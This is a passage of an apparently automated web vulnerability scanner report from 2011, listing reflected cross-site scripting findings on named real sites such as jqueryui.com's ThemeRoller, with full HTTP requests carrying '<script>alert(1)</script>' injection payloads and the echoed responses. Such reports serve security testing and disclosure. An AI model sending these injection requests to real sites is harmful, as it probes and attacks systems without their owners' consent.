The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a592"><script>alert(1)</script>edb7195d969 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=8888887a592"><script>alert(1)</script>edb7195d969&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b01e6"><script>alert(1)</script>0f6b126416c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ab01e6"><script>alert(1)</script>0f6b126416c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f40"><script>alert(1)</script>b5efdf2fccd was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50Fc3f40"><script>alert(1)</script>b5efdf2fccd&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd6e"><script>alert(1)</script>adbb59b0eda was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff8fd6e"><script>alert(1)</script>adbb59b0eda&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75e02"><script>alert(1)</script>7ea5a831bc2 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=45454575e02"><script>alert(1)</script>7ea5a831bc2&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=45454575e02"><script>alert(1)</script>7ea5a831bc2&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png& ...[SNIP]...
4.125. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb75b"><script>alert(1)</script>4df809d7d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?cb75b"><script>alert(1)</script>4df809d7d12=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55af7"><script>alert(1)</script>6e5e671217c was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px55af7"><script>alert(1)</script>6e5e671217c&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bf"><script>alert(1)</script>22581e16a07 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxbb7bf"><script>alert(1)</script>22581e16a07&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbb9"><script>alert(1)</script>258191088c6 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30fbbb9"><script>alert(1)</script>258191088c6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8af"><script>alert(1)</script>56a1225aef2 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30ea8af"><script>alert(1)</script>56a1225aef2&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2842d"><script>alert(1)</script>afd04d43505 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px2842d"><script>alert(1)</script>afd04d43505&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the v_sex request parameter is copied into the HTML document as plain text between tags. The payload 4b865<script>alert(1)</script>52d4c082b37 was submitted in the v_sex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?v_sex='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000335)%3C/script%3E4b865<script>alert(1)</script>52d4c082b37&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=4mrcg2j7545a2bqs4movqpf043; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 35297
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]... </script>4b865<script>alert(1)</script>52d4c082b37&v_exp=1&v_geo=&v_key=&fanof=&page=0&da=0&tot=7844&last_q=0&cat=All"> ...[SNIP]...
The value of the v_sex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cd3"><script>alert(1)</script>f881cc67bed was submitted in the v_sex parameter. This input was echoed as 26cd3\"><script>alert(1)</script>f881cc67bed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?v_sex=26cd3"><script>alert(1)</script>f881cc67bed&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=2ksh380kf3rbmf91c7pu1up442; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]... <a class=big href="?v_find=1&v_sex=26cd3\"><script>alert(1)</script>f881cc67bed&v_exp=1&v_geo=&v_key=&fanof=&page=0&da=0&tot=7844&last_q=0&cat=All"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb07a<script>alert(1)</script>f1f74a3196e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aownersfb07a<script>alert(1)</script>f1f74a3196e HTTP/1.1 Host: manual.ariens.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino/5.0.7 Date: Sat, 05 Feb 2011 21:58:38 GMT Connection: close Content-Type: text/html; charset=US-ASCII Content-Length: 346 Expires: Tue, 01 Jan 1980 06:00:00 GMT Cache-control: no-cache
<HTML> <!-- Lotus-Domino (Release 5.0.7 - March 21, 2001 on OS/400) --> <HEAD> <TITLE>Error</TITLE></HEAD> <BODY TEXT="000000"> <H1>Error 404</H1>HTTP Web Server: Couldn't find design note - aownersfb07a<script>alert(1)</script>f1f74a3196e <P> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e157<script>alert(1)</script>5c4cfcc19e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico6e157<script>alert(1)</script>5c4cfcc19e5 HTTP/1.1 Host: manual.ariens.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino/5.0.7 Date: Sat, 05 Feb 2011 23:03:09 GMT Connection: close Content-Type: text/html; charset=US-ASCII Content-Length: 350 Expires: Tue, 01 Jan 1980 06:00:00 GMT Cache-control: no-cache
